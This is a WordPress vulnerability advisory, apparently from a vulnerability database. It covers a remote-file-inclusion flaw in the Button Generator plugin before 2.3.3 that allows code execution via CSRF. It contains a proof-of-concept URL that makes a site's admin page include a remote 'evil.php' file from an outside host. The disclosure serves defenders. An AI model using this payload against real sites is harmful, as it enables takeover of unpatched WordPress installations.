WordPress Plugin Vulnerabilities

Button Generator < 2.3.3 - RFI leading to RCE via CSRF

Description

The plugin within the wow-company admin menu page allows to include() arbitrary file with PHP extension (as well as with data:// or http:// protocols), thus leading to CSRF RCE.

Proof of Concept

http://127.0.0.1:8001/wp-admin/admin.php?page=wow-company&tab=https%3A%2F%2Fstatic.kazet.cc%2Fevil.php%3F

PHP's allow_url_include must be set to "On"

Affects Plugins

Fixed in 2.3.3

References

Classification

Type
RCE
OWASP top 10
CWE
CVSS

Miscellaneous

Original Researcher
Krzysztof Zając
Submitter
Krzysztof Zając
Submitter website
Verified
Yes

Timeline

Publicly Published
2021-12-05 (about 2 years ago)
Added
2021-12-09 (about 2 years ago)
Last Updated
2022-04-11 (about 2 years ago)

Other